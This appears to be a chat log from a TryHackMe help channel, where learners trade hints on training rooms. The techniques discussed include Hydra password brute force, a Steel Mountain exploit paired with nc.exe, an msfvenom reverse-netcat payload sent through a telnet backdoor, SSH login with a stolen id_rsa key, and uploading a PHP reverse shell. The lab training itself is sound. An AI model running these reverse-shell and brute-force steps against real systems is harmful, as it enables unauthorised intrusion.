I'll try redeploying both machines and let's see if it works

ok, now it works...

thanks a lot for your help 🙂

Gave +1 Rep to @stuck fractal

I'm doing Network Services Task 10. I'm using Hydra and rockyou.txt to crack password. It has like 14344398 passwords to go through and it's going pretty slowly. I've been sat here more than 5 mins already. Am I doing this right? Is there a way to make it go quicker? How long will I actually have to wait?

Shouldn't be more than 5 minutes

I think the username is mike not Mike maybe

Probably

fwiw unix usernames are always lower case

tbh i think i was looking for an excuse to click around on some other stupid websites. pretty obvious really.

I'm stuck on Steel Mountain (non MetaSploit version). I am able to upload the nc.exe file once, but not twice to gain a shell. I have a nc listener on port 4444 (CMD = sudo nc -nlvp 4444) and python server on port 80 (CMD = sudo updog -p 80 - I have also tried python3 http.server 80). The python file 39161.py is configured with the IP directed back to my VM and the port as 4444 (same as the nc listener). The command I run is sudo python 39161.py target_machine_ip 8080. I downloaded the nc.exe file from the tryhackme page and changed the name to nc.exe from ncat. I made no other changes to the nc.exe file (ncat). The response from the server returns four lines of "GET /nc.exe HTTP/1.1" 200-. After I rerun the python file nothing occurs. I am sure I am missing something simple here.

Got some help and got it solved. Thank you.

My memory of that room isn't very good and I don't have my notes in front of me, so I'm not sure I can answer this one right now

No worries, I'll see if I come up with anything.

can anyone help me with autopsy room?I didn't find any writeup on it.

I'm currently doing the WebFundamentals Cross-site Scripting Room. And i'm stuck at the Reflected XSS Questions. Both are normally fully clear to me and i'm pretty sure that my answers are correct. I also double checked the writeup, but both answers weren't accepted. Can someone give me a hint why?

v 1 or V2?

both have dedicated help rooms #844288495165898796 and #848117260702580776

Hi! Can I ask privesc hints for Cat Pictures room already or not?

There's a channel dedicated to it: #850434990978105384

Thanks! But while writing my question my exploit worked hahaha pwned the room, but thanks ❤️

hey folks, i'm in the introtoshells room currently trying to catch a windows reverse shell generated with msfvenom using multi/handler. i generated the shell.exe file and uploaded it, and i'm running multi/handler in metasploit, but how do i activate the shell.exe file? when i go to /uploads/shell.exe it attempts to download the file

i guess i can just run it from the machine rather than from the browser now that i think about it. making it too complicated

why can't start a machine?

??

I was having dificulties starting an attack machine for past 1 hr but it worked now

are u vip member?

Hello, am I doing something wrong? I already have a tcpdump running on a terminal tab and run this syntax through telnet and nothing happens. Im doing the Exploiting Telnet in Network Services Room.

run this syntax but nothing happens "msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R"

Hi. Please provide a screenshot

I can't send a screenshot

Don't have the option to

??

he isnt verify

!docs verify

The task is asking what word the generated payload start with, but after sending the command nothing happens.

That command is used to generate the payload

Msfvenom is a hacking tool

It is not going to be installed on the target machine

Okay now I got the payload and run it through telnet and I already have nc -lvp 4444 running on another tab, where do I find the flag? nothing happens on the listener after I run the payload

I'm also working on the telnet problem... I've connected via telnet to the TM but it's not giving me the "SKIDY'S BACKDOOR. Typer .HELP" after connecting and showing the escape character

as well, no commands run under RUN or .HELP shows nothing

use .RUN then the command

lol even then

Are you on the ping part?

this is immediately after connecting with telnet [ip] [port]

Im stuck on the last two task for the exploit

i have been too, finding the flag.txt

but also this when trying to replicate lol

lol

Nothings happening after running the listener then running the payload.

I think I was having that problem too, initially. Then I tried to connect to the telnet session again and my issue occured

if everything were working correctly for me so far I'd be in the same boat as you tbh

Okay I can't exit too with .EXIT

ooif

If that doesn't work, just Ctrl + c to stop it

I just tried the connection thing with msfvenom. Worked for me as it should..

yeah im at the msfvenom part ideally

I'm going to try and kill my TM and start another machine

That's what I did:

1. msfvenom thingy
2. connect to telnet
3. start netcat listener
4. paste the output of msfvenom into the telnet session with ".RUN" at the beginning
   Hope that helps..

I've started the TM and gotten the IP but telnet isn't connecting yet. Guess I gotta wait a bit more lol

For me it came instantly. You're sure with the configured IP and port?

yeah the TM IP and port 8012

oh wait

hold on

I've done this, after sending the payload a message saying connect would appear on the listener, where would I find the flag there?

this is where I got stuck ^

I don't seem to get a shell on the TM

@slate geode if you do a "ls" ?

i've done LS before nothing happened, lemme try now

@prime willow is there no signifier that there's a shell, like $?

nope

ah

or am i in the wrong place

wrong place

ah damn it

so you can do it inside the listener

theoretically

sorry I'm really new at this, Thank you!

Gave +1 Rep to @prime willow

Glad I could help 🙂

@prime willow okay so now I'm where @slate geode was. I've entered in the mkfifo payload to the telnet session but nothing is showing any change

OR do i deploy the payload in the listener instead?

the payload goes into the window with the telnet session (start the listener before)

okay.

thank you 🙂

Gave +1 Rep to @prime willow

hey i need help with advert 2 room task 9 last question i used wfuzz and i even got something i dont know how to get the end result

here is a picture for ref

what was the command you used with wfuzz?

wfuzz -c -z file , wordlist http://machine-ip/api/thepath?date=FUZZ

This was the command i used

Instead of the word "wordlist" it needs an actual wordlist to be able to brute force the parameter

ya i used an actual worldist

big.txt was the wordlist

i use it like this

wfuzz -c -z file,./usr/share/wordlists/dirb/big.txt

@prime willow

this was what i used

get rid of the "." before the first slash

yes there is no dot ignore that

i got this

Then please provide the actual command you used

okay

the whole command

wfuzz -c -z file,/usr/share/wordlists/dirb/big.txt http://10.10.161.68/api/site-log.php?date=FUZZ

this is the whole command

"u" missed something

i see

let me try

wfuzz -c -z file,/usr/share/wordlists/dirb/big.txt -u http://10.10.161.68/api/site-log.php?date=FUZZ

and i got this

i guess i am using the wrong wordlist and i dont know where to find the wordlist

could be

thanks man i was making a python code to make wordlist

Gave +1 Rep to @tight fulcrum

thanks

How to find the ssid using wigle.net?

I can see the circle where it is but not the ssid :/

try creating an account and logging in. looks like they're only showing detailed data to registered users

remember 10 minute mail is a thing if you don't want to use your real details

In the exploiting smb room in networking services I have downloaded the id_rsa file and ran chmod 600 on it. How do I use this file for the password? I'm using smbclient //ip/netlogon -U johncactus -p 139 and I'm being asked for a password.

@chilly vapor if you successfully stole an id_rsa file, you probably don't want to use smb again, consider using an other service ... 😉

hey all i'm trying to break into the 'internal lab' machine and struggling. anyone have any hints as to what i should be looking at?

Pathway: absolute beginner
Room: Network Services
task: 4 (Exploiting SMB)
It asks me the password of anonymous, but i don't have it

press enter.

Anonymous has no password

tree connect failed: NT_STATUS_BAD_NETWORK_NAME

this is written as soon as i press enter

it goes now

thank you for the help

Thank you. I didn't think to try to ssh into the server

Gave +1 Rep to @zinc tinsel

Hey folks! I'm on Linux Fundamentals pt3, Processes 101. It's asking me to find an "out of the ordinary" process on the target system, which I believe I've found, but I don't know how to find the flag.

The name of the process is the flag

oh hahah

If you see it you know that's a flag

looks like it's formatted in the THM{ANSWER} way

Correct

okay thank you

Gave +1 Rep to @tight fulcrum

lil tip: you can use grep 😉

..to find a process?!

unless I just output the result of a ps command in to a file?

did you find it?

||ps | grep||

I have not

ty. Bash scripting syntax is something I'm still struggling with.

Then check use ps aux . There's your answer

Not exactly scripting, just simple redirection which the room covers

ah

okay

oh jesus it's been there the whole time

Well done 😄

thank you as well

Gave +1 Rep to @stuck fractal

thanks folksd

love this community so far.

still struggling with exploiting smb, I stole the id_rsa file, how do I use the file as the password to ssh into the server?

You don't use it as the password

@stuck fractal can you point me in the right direction?

I suspect you can find out about it with some research

please help me out

move the file to attackbox .ssh directory?

for most commands, appending either --help or -h gives you an idea on the various options for that given command. Also, man ssh gives you a detailed manual for that command.

@pulsar minnow the -i flag with the path to the file?

worth a shot, don't you think? 🙂

@pulsar minnow thank you

Gave +1 Rep to @pulsar minnow

I am solving the wekor room.I found the ||subdomain|| and the|| wordpress|| .I know that there is an account by the name ||admin||.Do I have to bruteforce it??

https://tryhackme.com/room/wekorra

if not then a nudge would be highly appreviated.

okay one more from the Linux Fundamentals 3, Maintaining your System: Automation. I donn't know if I'm seeing the proper cron job, because it's not giving a time / pattern column as the hint says to look for

Answer will look like @------ where - is a character

OH

Guess you found it 😄

I was typing it WITHOUT the "@" this whole time

like a half hour I've been scouring that machine

Sadly you need it with @. Next time check if the character count matches

Since without @ you're missing 1 char

https://tryhackme.com/room/furthernmap

task: 5
question: 1

I cant find the answer

please help me

Check the text in the task. Answer is RFC XXX

hmmm lets see

oh

got it

BRUH

@tight fulcrum

thank you

Make sure to read the text

yeah but I didnt understand the question lol

so I need a hint to complete

the answer

lol

Pathway: absolute beginner
Room: Network Services
task: 4 (Exploiting SMB)
Question: Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
I can't find any information for the response to this question

What documents have you found?

Have you tried reading them?

i can see the names of the files, but i don't how to look the content of the files

.cache
.profile
.sudo_as_admin_successful
.bash_logout
.viminfo
Working From Home Information.txt
.ssh
.bashrc
.gnupg

these are the files

Try some research on smbclient, something like "smbclient basics"

i'm still stuck

ok I'm not stuck anymore, thank you for the advice!

Gave +1 Rep to @stuck fractal

hi, I'm trying with the OWASP Top 10 and I'm stucked in task 7, I tried to make with arthur the same as I did with darren, but it doesn't work 😦

any help?

ok, done, I wont put the answer here for obvious reasons

Room: Network Services
task: 6 (Enumerating Telnet)
Question: Based on the title returned to us, what do we think this port could be used for?

im not sure what im missing, there not title wihtin the nmap scan from the take above. and ive tried the service results from a an online search for the port. am i looking at the question wrong?

just think about what you could use this port if you were a hacker

yea got it thanks, i was thinking too on screen for information

can someone help me with polosmb3?

I have the id_rsa key but i dont know what username and pass or even what port to use to ssh with it

this is in task 4: exploiting SMB

final question

You can easily find the port

Especially since it's the default

You don't need a password because you have the key.

and user?

That leaves just the username.
You can find it defined explicitly in one of the files or guess it from the names you found in the longer text file

so to be clear, is the command ssh -i id_rsa [user]@[ip] -p [port]?

oh and btw, is there any way to "cat" files from smbclient? without having to "get" them to my computer first?

No, there is not

And you don't need to specify the port if it's the default

ah i got it

I'd also avoid supplying options after the user@host part, as that's where you can put a command to run after logging in to SSH.

im in

i see

thank you for your help and tips :)

I thought I found a way to do it that worked half the time. Some sort of pipe or redirect from a get, maybe

In FTP, you can get file -
Doesn't work in smbclient

maybe that's what it was

i'm doing a through scan to find all open ports for Network Services 2 room. The scans take ages. I'm using nmap -p- [ip] -T5

and nmap -Pn -p- [ip] -T5

but it's still taking forever. I did the scan with -Pn on a task in Network Services 1 room and it ran way faster.

any tips on how to speed it up or why one was faster than the other in two separate rooms?

@untold locust You can use rustscan. This portscanner is much faster than nmap.

any idea why it was so much faster scanning one host with -Pn than the other?

What is the name of the career role that is legally employed to find vulnerabilities in applications?

lol at the flag name at the end of the smb tasks in network services.. you knew..

Anyone know the password to ssh into the TryHackMe network in the ctf room RootMe?

Haven't been able to even start cause I don't have tbr right password😂 😅

You do not get given access

You need to have a machine to attack from

Like the attackbox or your own Kali

Then you need to hack into the target machine

Think I get it, thanks!

Gave +1 Rep to @stuck fractal

Navigate to /usr/share/webshells/php/php-reverse-shell.php in Kali and change the IP and port to match your tun0 IP with a custom port. Set up a netcat listener, then upload and activate the shell.

i need help with this

i am not able to find webshells/php in my target machine

anyone?

To clarify...
You've found the version on Kali, edited it, and uploaded it to the target?
You just can't find where it's been uoloaded to?
Also, what room and task is this?

can i dm u ?

the task shells room task is 13 and i am not understand how to access the php payload

it is not available on the ssh shell the webshell php

Hi guys, some hint for the root2 password on LinuxServerForensics (Task 5)?
I've found something in etc/passwd but it's not correct.